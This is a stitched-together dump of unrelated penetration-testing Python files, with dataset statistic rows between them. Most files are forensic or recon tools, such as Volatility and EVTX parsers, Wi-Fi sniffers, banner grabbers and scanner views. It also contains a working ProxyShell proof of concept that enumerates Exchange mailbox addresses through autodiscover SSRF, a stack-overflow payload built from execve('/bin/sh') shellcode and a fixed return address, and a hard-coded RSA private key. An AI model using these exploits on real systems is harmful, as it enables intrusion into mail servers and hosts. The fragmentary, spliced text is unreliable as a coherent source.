print ("Total passwords: "+str(contador['Passwords']))
print ("Total passwords decode: "+str(contador['Passwords_decode']))
if varCacheoffOK == 0 or showAll == 0:
print ("Total files in offlineCache: "+str(contador['Cacheoffline']))
if varCacheoffOK == 0 and showAll == 1:
print ("Total extract files in offlineCache (-extract): "+str(contador['Cacheoffline_extract']))
if varCertOK == 0 or showAll == 0:
print ("Total Certificated override: "+str(contador['Cert']))
if varThumbOK == 0 or showAll == 0:
print ("Total Images Thumbnails: "+str(contador['Thumbnails']))
if varSessionOK == 0 or showAll == 0:
print ("Total webs in last session: "+str(contador['Session1']))
print ("Total webs in backup session: "+str(contador['Session2']))
print ("\n")
else:
show_help()
sys.exit()
# Site: www.dumpzilla.org
# Author: Busindre ( busilezas[@]gmail.com )
# Version: 15/03/2013
| 42.130894 | 974 | 0.561847 |
cybersecurity-penetration-testing | # Volatility
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
@author: Holger Macht
@license: GNU General Public License 2.0 or later
@contact: holger@homac.de
"""
import volatility.obj as obj
import volatility.plugins.linux.flags as linux_flags
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.dalvik_find_gdvm_offset as dalvik_find_gdvm_offset
import volatility.plugins.linux.dalvik as dalvik
import sys, traceback
class dalvik_vms(linux_common.AbstractLinuxCommand):
"""Gather informationen about the Dalvik VMs running in the system"""
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_GDVM_OFFSET(self._config)
dalvik.register_option_PID(self._config)
def calculate(self):
offset = 0x0
# this offset is valid throughout all processes
if self._config.GDVM_OFFSET:
# argument is given in hex
gDvmOffset = int(self._config.GDVM_OFFSET, 16)
else:
gDvmOffset = dalvik_find_gdvm_offset.dalvik_find_gdvm_offset(self._config).calculate()
for task, vma in dalvik.get_data_section_libdvm(self._config):
gDvm = obj.Object('DvmGlobals', offset = vma.vm_start + gDvmOffset, vm = task.get_process_address_space())
# sanity check: Is this a valid DvmGlobals object?
#if not dalvik.isDvmGlobals(gDvm):
# continue
yield task, gDvm
def render_text(self, outfd, data):
self.table_header(outfd, [("PID", "5"),
("name", "15"),
("heapStartingSize", "15"),
("heapMaximumSize", "15"),
("heapGrowthLimit", "15"),
("stackSize", "10"),
("tableSize", "10"),
("numDeadEntries", "15"),
("numEntries", "15")])
for task, dvm in data:
self.table_row(outfd,
task.pid,
task.comm,
dvm.heapStartingSize,
dvm.heapMaximumSize,
dvm.heapGrowthLimit,
dvm.stackSize,
dvm.loadedClasses.dereference().tableSize,
dvm.loadedClasses.dereference().numDeadEntries,
dvm.loadedClasses.dereference().numEntries)
| 40.2625 | 118 | 0.58697 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import os
import sys
def retBanner(ip, port):
try:
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect((ip, port))
banner = s.recv(1024)
return banner
except:
return
def checkVulns(banner, filename):
f = open(filename, 'r')
for line in f.readlines():
if line.strip('\n') in banner:
print '[+] Server is vulnerable: ' +\
banner.strip('\n')
def main():
if len(sys.argv) == 2:
filename = sys.argv[1]
if not os.path.isfile(filename):
print '[-] ' + filename +\
' does not exist.'
exit(0)
if not os.access(filename, os.R_OK):
print '[-] ' + filename +\
' access denied.'
exit(0)
else:
print '[-] Usage: ' + str(sys.argv[0]) +\
' <vuln filename>'
exit(0)
portList = [21,22,25,80,110,443]
for x in range(147, 150):
ip = '192.168.95.' + str(x)
for port in portList:
banner = retBanner(ip, port)
if banner:
print '[+] ' + ip + ' : ' + banner
checkVulns(banner, filename)
if __name__ == '__main__':
main()
| 21.37931 | 50 | 0.474942 |
cybersecurity-penetration-testing | import socket
import sys, os, signal
sniff = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 3)
sniff.bind(("mon0", 0x0003))
ap_list =[]
while True :
fm1 = sniff.recvfrom(6000)
fm= fm1[0]
if fm[26] == "\x80" :
if fm[36:42] not in ap_list:
ap_list.append(fm[36:42])
a = ord(fm[63])
print "SSID -> ",fm[64:64 +a],"-- BSSID -> ", \
fm[36:42].encode('hex'),"-- Channel -> ", ord(fm[64 +a+12])
| 23.058824 | 60 | 0.590686 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
from scapy.all import *
interface = 'mon0'
hiddenNets = []
unhiddenNets = []
def sniffDot11(p):
if p.haslayer(Dot11ProbeResp):
addr2 = p.getlayer(Dot11).addr2
if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
netName = p.getlayer(Dot11ProbeResp).info
print '[+] Decloaked Hidden SSID : ' +\
netName + ' for MAC: ' + addr2
unhiddenNets.append(addr2)
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: ' +\
'with MAC:' + addr2
hiddenNets.append(addr2)
sniff(iface=interface, prn=sniffDot11)
| 25.0625 | 63 | 0.563025 |
thieves-tools | from setuptools import setup, find_packages
# pip install --editable .
setup(
name='thieves-tools',
author='Drake Axelrod',
description='Information about useful pen-testing tools in addition to any reusable scripts I myself have written',
version='0.0.1',
packages=find_packages(),
include_package_data=True,
py_modules=['thvtools'],
python_requires='>=3.10',
install_requires=[
'click',
'beautifulsoup4',
'pywebview'
],
entry_points={
'console_scripts': [
'thvtools=thvtools:cli'
]
}
)
| 23.12 | 119 | 0.60299 |
Effective-Python-Penetration-Testing | from Crypto.Cipher import AES
import os, random, struct
def decrypt_file(key, filename, chunk_size=24*1024):
output_filename = os.path.splitext(filename)[0]
with open(filename, 'rb') as infile:
origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(output_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunk_size)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
decrypt_file('abcdefghji123456', 'sample-file.txt.encrypted'); | 31.636364 | 76 | 0.594142 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalCrossSiteScripting")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.181818 | 75 | 0.784375 |
owtf | """
SEMI-PASSIVE Plugin for Testing for HTTP Methods and XST (OWASP-CM-008)
"""
from owtf.managers.resource import get_resources
from owtf.managers.target import get_targets_as_list
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Normal request for HTTP methods analysis"
def run(PluginInfo):
resource = get_resources("SemiPassiveHTTPMethods")
Content = plugin_helper.TransactionTableForURLList(
True, get_targets_as_list(["target_url", "top_url"]), "OPTIONS"
)
# No previous output
Content += plugin_helper.CommandDump(
"Test Command", "Output", resource, PluginInfo, []
)
return Content
| 29.904762 | 71 | 0.719136 |
Mastering-Kali-Linux-for-Advanced-Penetration-Testing-4E | #!/usr/bin/env python3
#
# Credits to - https://github.com/dmaasland/proxyshell-poc
import argparse
import random
import string
import requests
import sys
import xml.etree.ElementTree as ET
class ProxyShell:
def __init__(self, exchange_url, verify=False):
self.exchange_url = exchange_url if exchange_url.startswith(
'https://') else f'https://{exchange_url}'
self.rand_email = f'{rand_string()}@{rand_string()}.{rand_string(3)}'
self.session = requests.Session()
self.session.verify = verify
self.session.headers = {
'Cookie': f'Email=autodiscover/autodiscover.json?a={self.rand_email}'
}
def post(self, endpoint, data, headers={}):
url = f'{self.exchange_url}/autodiscover/autodiscover.json?a={self.rand_email}{endpoint}'
r = self.session.post(
url=url,
data=data,
headers=headers
)
return r
def rand_string(n=5):
return ''.join(random.choices(string.ascii_lowercase, k=n))
def get_args():
parser = argparse.ArgumentParser(description='ProxyShell example')
parser.add_argument('-u', help='Exchange URL', required=True)
return parser.parse_args()
def get_emails(proxyshell):
data = '''
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
<m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
</m:ResolveNames>
</soap:Body>
</soap:Envelope>
'''
headers = {
'Content-Type': 'text/xml'
}
r = proxyshell.post(
f'/EWS/exchange.asmx',
data=data,
headers=headers
)
email_xml = ET.fromstring(r.content)
emails = email_xml.findall(
'{*}Body/{*}ResolveNamesResponse/{*}ResponseMessages/{*}ResolveNamesResponseMessage/{*}ResolutionSet/{*}Resolution/{*}Mailbox/{*}EmailAddress'
)
for email in emails:
print(f'Found address: {email.text}')
def main():
args = get_args()
exchange_url = args.u
proxyshell = ProxyShell(
exchange_url
)
get_emails(proxyshell)
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
print("This script requires Python 3.8 or higher!")
print("You are using Python {}.{}.".format(
sys.version_info.major, sys.version_info.minor))
sys.exit(1)
main()
| 25.272727 | 150 | 0.638975 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : vul_scanner.py
# @Desc : ""
import time
from flask import Blueprint, render_template, request, redirect, url_for, jsonify
from bson import ObjectId
from threading import Thread
from lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.modules.scanner.poc_scanner import PocsuiteScanner
from fuxi.views.authenticate import login_check
vul_scanner = Blueprint('vul_scanner', __name__)
tasks_db = db_name_conf()['tasks_db']
asset_db = db_name_conf()['asset_db']
server_db = db_name_conf()['server_db']
subdomain_db = db_name_conf()['subdomain_db']
vul_db = db_name_conf()['vul_db']
plugin_db = db_name_conf()['plugin_db']
# tasks view
@vul_scanner.route('/task-management')
@login_check
def tasks_view():
# delete task
if request.args.get('delete'):
task_id = request.args.get('delete')
connectiondb(tasks_db).delete_one({'_id': ObjectId(task_id)})
connectiondb(vul_db).update({'task_id': ObjectId(task_id)}, {"$set": {"tag": "delete"}}, multi=True)
return "success"
# rescan
elif request.args.get('rescan'):
task_id = request.args.get('rescan')
connectiondb(tasks_db).update_one({'_id': ObjectId(task_id)}, {'$set': {'task_status': 'Preparation'}})
if connectiondb(vul_db).find_one({"task_id": ObjectId(task_id)}):
connectiondb(vul_db).update({'task_id': ObjectId(task_id)}, {"$set": {"tag": "delete"}}, multi=True)
try:
scanner = PocsuiteScanner(ObjectId(task_id))
t1 = Thread(target=scanner.set_scanner, args=())
t1.start()
return "success"
except Exception as e:
raise e
# get task info for edit (get)
elif request.args.get('edit'):
task_id = request.args.get('edit')
task_edit_data = connectiondb(tasks_db).find_one({'_id': ObjectId(task_id)})
task_edit_data_json = {
'task_name': task_edit_data['task_name'],
'scan_target': '\n'.join(task_edit_data['scan_target']),
}
return jsonify(task_edit_data_json)
# default task view
task_data = connectiondb(tasks_db).find().sort('end_date', -1)
return render_template('task-management.html', task_data=task_data)
# task edit
@vul_scanner.route('/task-edit', methods=['POST'])
@login_check
def tasks_edit():
# task update
task_name = request.form.get('taskname_val')
task_plan = request.form.get('recursion_val')
target_text = request.form.get('target_val').split('\n', -1)
task_id = request.form.get('task_id')
update_task_data = connectiondb(tasks_db).update_one(
{'_id': ObjectId(task_id)},
{'$set': {
'task_name': task_name,
'task_recursion': task_plan,
'scan_target': target_text,
}
}
)
if update_task_data:
scanner = PocsuiteScanner(ObjectId(task_id))
t1 = Thread(target=scanner.set_scanner, args=())
t1.start()
return 'success'
# new scan view
@vul_scanner.route('/new-scan', methods=['GET'])
@login_check
def scan_view():
# default create scan view
plugin_info = connectiondb(plugin_db).find()
return render_template('new-scan.html', plugin_info=plugin_info)
# create task
@vul_scanner.route('/add-task', methods=['POST'])
@login_check
def add_task():
# create task from new scan view (post)
if request.form.get('source') == 'scan_view':
task_data = {
"task_name": time.strftime("%y%m%d", time.localtime()) + "_" + request.form.get('taskname_val'),
"task_recursion": request.form.get('recursion_val'),
"scan_target": request.form.get('target_val').replace('\r', '').split('\n', -1),
"plugin_id": request.form.get('plugin_val').split(',', -1),
"start_date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"end_date": "-",
"task_status": "Preparation"
}
if task_data:
task_id = connectiondb(tasks_db).insert_one(task_data).inserted_id
if task_id:
scanner = PocsuiteScanner(task_id)
t1 = Thread(target=scanner.set_scanner, args=())
t1.start()
return "success"
else:
return 'error'
# create task from asset (post)
elif request.form.get('source') == 'asset':
task_data = {
"task_name": time.strftime("%y%m%d", time.localtime()) + "_" + request.form.get('taskname_val'),
"task_recursion": request.form.get('recursion_val'),
"scan_target": request.form.get('target_val').replace('\r', '').split('\n', -1),
"plugin_id": request.form.get('plugin_val').split(',', -1),
"start_date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"end_date": "-",
"task_status": "Preparation"
}
if task_data:
task_id = connectiondb(tasks_db).insert_one(task_data).inserted_id
if task_id:
scanner = PocsuiteScanner(task_id)
t1 = Thread(target=scanner.set_scanner, args=())
t1.start()
return 'success'
else:
return 'error'
# create task from sub domain (post)
elif request.form.get('source') == 'subdomain':
task_data = {
"task_name": time.strftime("%y%m%d", time.localtime()) + "_" + request.form.get('taskname_val'),
"task_recursion": request.form.get('recursion_val'),
"scan_target": request.form.get('target_val').replace('\r', '').split('\n', -1),
"plugin_id": request.form.get('plugin_val').split(',', -1),
"start_date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"end_date": "-",
"task_status": "Preparation"
}
if task_data:
task_id = connectiondb(tasks_db).insert_one(task_data).inserted_id
if task_id:
scanner = PocsuiteScanner(task_id)
t1 = Thread(target=scanner.set_scanner, args=())
t1.start()
return 'success'
else:
return 'error'
@vul_scanner.route('/vulnerability', methods=['POST', 'GET'])
@login_check
def vulnerability_view():
if request.method == "GET":
# vulnerability delete
if request.args.get('delete'):
vul_id = request.args.get('delete')
# task_id = connectiondb(vul_db).find_one({'_id': ObjectId(vul_id)})['task_id']
# connectiondb(vul_db).delete_one({'_id': ObjectId(vul_id)})
connectiondb(vul_db).update({'_id': ObjectId(vul_id)}, {"$set": {"tag": "delete"}}, multi=True)
return redirect(url_for('vul_scanner.vulnerability_view'))
# vulnerability rescan (Not completed)
elif request.args.get('rescan'):
vul_id = request.args.get('rescan')
print(vul_id)
# Not completed
# vulnerability details
elif request.args.get('result'):
vul_id = request.args.get('result')
vul_info = connectiondb(vul_db).find_one({'_id': ObjectId(vul_id)})
del vul_info['_id']
del vul_info['task_id']
del vul_info['plugin_id']
if vul_info:
return jsonify(vul_info)
else:
return jsonify({"result": "Get details error"})
# from task view screening vulnerabilities by task_id
elif request.args.get('task'):
task_id = request.args.get('task')
vul_data = connectiondb(vul_db).find({'task_id': ObjectId(task_id), "tag": {"$ne": "delete"}}).sort(
'scan_date', -1)
return render_template('vulnerability.html', vul_data=vul_data)
# from plugin view screening vulnerabilities by plugin_id
elif request.args.get('plugin'):
plugin_id = request.args.get('plugin')
vul_data = connectiondb(vul_db).find({'plugin_id': ObjectId(plugin_id),
"tag": {"$ne": "delete"}}).sort('date', -1)
return render_template('vulnerability.html', vul_data=vul_data)
# default vulnerability view
vul_data = connectiondb(vul_db).find({"tag": {"$ne": "delete"}}).sort('date', -1)
return render_template('vulnerability.html', vul_data=vul_data)
elif request.method == "POST":
# delete multiple choices
# Not completed
return jsonify({'result': 'success'})
| 38.515982 | 112 | 0.566046 |
cybersecurity-penetration-testing | #!/usr/bin/env python
import mmap
import contextlib
import argparse
from xml.dom import minidom
from Evtx.Evtx import FileHeader
from Evtx.Views import evtx_file_xml_view
def main():
parser = argparse.ArgumentParser(description="Dump specific event ids from a binary EVTX file into XML.")
parser.add_argument("--cleanup", action="store_true", help="Cleanup unused XML entities (slower)"),
parser.add_argument("evtx", type=str, help="Path to the Windows EVTX event log file")
parser.add_argument("out", type=str, help="Path and name of the output file")
parser.add_argument("--eventID", type=int, help="Event id that should be extracted")
args = parser.parse_args()
outFile = open(args.out, 'a+')
with open(args.evtx, 'r') as f:
with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf:
fh = FileHeader(buf, 0x0)
outFile.write("<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?>")
outFile.write("<Events>")
for xml, record in evtx_file_xml_view(fh):
xmldoc = minidom.parseString(xml)
event_id = xmldoc.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
if event_id == str(args.eventID):
outFile.write(xml)
else:
continue
outFile.write("</Events>")
if __name__ == "__main__":
main() | 41.323529 | 109 | 0.622392 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += '\x90'*232
buffer += '\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05'
buffer += pack("<Q", 0x7fffffffe2c0)
f = open("input.txt", "w")
f.write(buffer)
| 28.5 | 140 | 0.676871 |
Python-Penetration-Testing-for-Developers | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
def __init__(self):
self.app = QApplication(sys.argv)
QWebView.__init__(self)
self._loaded = False
self.loadFinished.connect(self._loadFinished)
def wait_load(self, delay=0):
while not self._loaded:
self.app.processEvents()
time.sleep(delay)
self._loaded = False
def _loadFinished(self, result):
self._loaded = True
def get_image(self, url):
self.load(QUrl(url))
self.wait_load()
frame = self.page().mainFrame()
self.page().setViewportSize(frame.contentsSize())
image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
painter = QPainter(image)
frame.render(painter)
painter.end()
return image
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
cybersecurity-penetration-testing | import requests
import re
from bs4 import BeautifulSoup
import sys
if len(sys.argv) !=2:
print "usage: %s targeturl" % (sys.argv[0])
sys.exit(0)
urls = []
tarurl = sys.argv[1]
url = requests.get(tarurl)
comments = re.findall('<!--(.*)-->',url.text)
print "Comments on page: "+tarurl
for comment in comments:
print comment
soup = BeautifulSoup(url.text)
for line in soup.find_all('a'):
newline = line.get('href')
try:
if newline[:4] == "http":
if tarurl in newline:
urls.append(str(newline))
elif newline[:1] == "/":
combline = tarurl+newline
urls.append(str(combline))
except:
pass
print "failed"
for uurl in urls:
print "Comments on page: "+uurl
url = requests.get(uurl)
comments = re.findall('<!--(.*)-->',url.text)
for comment in comments:
print comment | 22.657895 | 49 | 0.58686 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
l1=[1,2,3,4]
l2=[5,6]
sq_even=[x**2 for x in l1 if x%2 ==0]
l_sum=[x+y for x in l1 for y in l2]
sq_values=[{x:x**2} for x in l1]
print("Even squares : " +str(sq_even))
print("Sum nested Loop : " +str(l_sum))
print("Squares Dict : " +str(sq_values))
| 23.727273 | 40 | 0.601476 |
cybersecurity-penetration-testing | import zlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
encrypted = """XxfaX7nfQ48K+l0rXM3tQf3ShFcytAQ4sLe6vn8bWdreho4riaJ5Dy5PeijSKbsgWSMoeZLmihxb0YAFgCaIp11AUl4kmIiY+c+8LJonbTTembxv98GePM1SEme5/vMwGORJilw+rTdORSHzwbC56sw5NG8KosgLWwHEGEGbhii2qBkuyQrIc9ydoOKKCe0ofTRnaI2c/lb9Ot3vkEIgxCks94H6qVkAfhO34HS7nClUldn9UN040RYgtEqBgvAFzoEhDuRtfjJu1dzyzaFtRAVhcQ6HdgZMWRfpaxKQOmbhXwYyGRQfwNl/Rwgn1EJBFAhvIaEifHDlCw+hLViNYlae7IdfIb6hWtWPyFrkaNjmkbhhXclNgZe0+iPPDzsZbpHI1IckG0gVlTdlGKGz+nK5Cxyso41icC4gO7tmdXDGgF6bMt/GC1VjMVmL/rYsb8jzJblmuQBAeFNacyhjxrzIH5v60RQ1BxwfD+wLCKfyzn3vQucPak2cnwBs3yTIEShYj0ymP4idU/5Qt5qkqMDyvO4U8DmqB4KT58+o2B3c88+lUZjz7c9ygwKjp2hSNf+Dm9H3YJY2Pn6YlydyT1sYWCy06DZko7z3uae5GYGjez8hnCIFt+mpeLvEelSHeZfyV8wYyHg5Y9eA2NZNX6yNVD8IREhjXGWdbGTn41lVCqEiCetY9SKdWeL1Hp/vJN3SOo4qglbQF7P6oqqg0bofnAcphLVaHw/FOGWtW1CFEQUQdIg9bk+SJqM/s1ozJlisenrRzxv3L5LthEfLflCafK0u3n2gPa4F3ok4tx9i+r+MykRTw+OksMfVu71CAMuJdrFQLMSpyWkQ86Vc/QIXgdoCKkAYx5xr/U8gDXkZ4GvL9biEZv/fb5Wh7Br1Hu6idUgTYpEJVVnMuI13ePGeJLA54Il2S7aDyrgfhb61WQmoMRGvLP7uxCjgLwrxZNjAYJTmXszLvvgmI+lHe5o8rgQw6zSGpl9k27urV4bA0Zt+PsYiLNbEQqqxrJxKcbKqozl8XtfMXanct9pKu4vaq8fH/j9jvZ133UtcaR5iTQ0K7P4J5Qoaxz3uUhGrgplZ1jE9Nr0iyRj722dW82b4m1f/h80K7EuvwEeOfdYZl7iFL8yRi9dfopwATjKbKrWFroGCb/wvpc5ujpzDfwAeWsSU4Nve2qBDo5coVt1GI8rzHUh52TQ007JhcYABIxZGSFeeJ3bFgvqO2kUK/Pc36Au0VlNFds/j+fIuMlmFUuckBLCTpE2W9hYqmVOWBmyeZPJNzVI4gLexFbXbg8+0Eq6Pa4MxZsR3wypgC9LE/dvLbQ3oSn9x7nKMXpdq9r+xK1sjodpeYNz7t/5GpFu1teN0SFbmsoXjVEyOAn3L5Gd4Wxua7y9xOixc1H2/bbyNqJZAjEm34DDmNRTQtrqCwOEXwFGKgRGUzPYGC74wAPDDTaQEBv7Toc7rfkzgRX4ROW0SUaEPmi5tAlXe+CKVdJGtLKXUXYRHLMZ4jTzGsD89dmt2r2Fh6AUUN2e9jzzK2ULMnMhRUnDdcM74jbuDHGtXt56pFxFKJ21FQFS8JK0ZOqYa+0JjLuSzrLN9gSCu/JuTPC60LTxLsLcWZVR7cIHQE+sgDtt40/6O1YE7/8rs6qB9re28gDY1s9R5HFtjowO3ylRWqlaV9MC1OGzM4xHPxG2V+2zuq6ol8Cs="""
private_key = """-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyXUTgFoL/2EPKoN31l5Tlak7VxhdusNCWQKDfcN5Jj45GQ1o
ZZjsECQ8jK5AaQuCWdmEQkgCEV23L2y71G+Th/zlVPjp0hgC6nOKOuwmlQ1jGvfV
vaNZ0YXrs+sX/wg5FT/bTS4yzXeW6920tdls2N7Pu5N1FLRW5PMhk6GW5rzVhwdD
vnfaUoSVj7oKaIMLbN/TENvnwhZZKlTZeK79ix4qXwYLe66CrgCHDf4oBJ/nO1oY
welxuIXVPhIZnVpkbz3IL6BfEZ3ZDKzGeRs6YLZuR2u5KUbr9uabEzgtrLyOeoK8
UscKmzOvtwxZDcgNijqMJKuqpNZczPHmf9cS1wIDAQABAoIBAAdOiMOKAI9lrNAk
7o7G4w81kSJqjtO8S0bBMZW5Jka90QJYmyW8MyuutMeBdnKY6URrAEILLJAGryM4
NWPSHC69fG/li02Ec26ffC8A67FSR/rtbEIxj4tq6Q6gg0FLwg5EP6b/+vW61a1+
YBSMa0c+ZZhvE7sJg3FQZDJflQKPXFHYxOlS42+UyUP8K07cFznsQCvia9mCHUG6
BDFbV/yjbMyYgKTCVmMeaCS2K0TlbcyGpF0Bz95mVpkrU6pHXY0UAJIv4dyguywe
dBZcJlruSRL0OJ+3Gb3CJS7YdsPW807LSyf8gcrHMpgV5z2CdGlaoaLBJyS/nDHi
n07PIbECgYEA4Rjlet1xL/Sr9HnHVUH0m1iST0SrLlQCzrMkiw4g5rCOCnhWPNQE
dpnRpgUWMhhyZj82SwigkdXC2GpvBP6GDg9pB3Njs8qkwEsGI8GFhUQfKf8Bnnd2
w3GUHiRoJpVxrrE3byh23pUiHBdbp7h2+EaOTrRsc2w3Q4NbNF+FOOkCgYEA5R1Z
KvuKn1Sq+0EWpb8fZB+PTwK60qObRENbLdnbmGrVwjNxiBWE4BausHMr0Bz/cQzk
tDyohkHx8clp6Qt+hRFd5CXXNidaelkCDLZ7dasddXm1bmIlTIHjWWSsUEsgUTh7
crjVvghU2Sqs/vCLJCW6WYGb9JD2BI5R9pOClb8CgYEAlsOtGBDvebY/4fwaxYDq
i43UWSFeIiaExtr30+c/pCOGz35wDEfZQXKfF7p6dk0nelJGVBVQLr1kxrzq5QZw
1UP/Dc18bvSASoc1codwnaTV1rQE6pWLRzZwhYvO8mDQBriNr3cDvutWMEh4zCpi
DMJ9GDwCE4DctuxpDvgXa9kCgYEAuxNjo30Qi1iO4+kZnOyZrR833MPV1/hO50Y4
RRAGBkX1lER9ByjK/k6HBPyFYcDLsntcou6EjFt8OnjDSc5g2DZ9+7QKLeWkMxJK
Yib+V+4Id8uRIThyTC4ifPN+33D4SllcMyhJHome/lOiPegbNMC5kCwMM33J455x
vmxjy/ECgYAOrFR7A9fP4QlPqFCQKDio/FhoQy5ERpl94lGozk4Ma+QDJiRUxA3N
GomBPAvYGntvGgPWrsEHrS01ZoOKGBfk5MgubSPFVI00BD6lccmff/0tOxYtb+Pp
vOGHt9D9yo3DOhyvJbedpi3u3g13G+FZFw6d1T8Jzm5eZUvG7WeUtg==
-----END RSA PRIVATE KEY-----"""
rsakey = RSA.importKey(private_key)
rsakey = PKCS1_OAEP.new(rsakey)
offset = 0
decrypted = ""
encrypted = base64.b64decode(encrypted)
while offset < len(encrypted):
decrypted += rsakey.decrypt(encrypted[offset:offset+256])
offset += 256
# now we decompress to original
plaintext = zlib.decompress(decrypted)
print plaintext | 73.557692 | 1,726 | 0.925955 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'BlindProject'
db.create_table(u'xtreme_server_blindproject', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('public_IP', self.gf('django.db.models.fields.TextField')()),
('blind_URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('method', self.gf('django.db.models.fields.TextField')()),
('param_name', self.gf('django.db.models.fields.TextField')()),
('param_value', self.gf('django.db.models.fields.TextField')()),
('match_string', self.gf('django.db.models.fields.TextField')()),
('success_flg', self.gf('django.db.models.fields.TextField')()),
('project_status', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['BlindProject'])
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_parameters', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('queueName', self.gf('django.db.models.fields.TextField')(default='-1')),
('auth_mode', self.gf('django.db.models.fields.TextField')(default='Not Set')),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
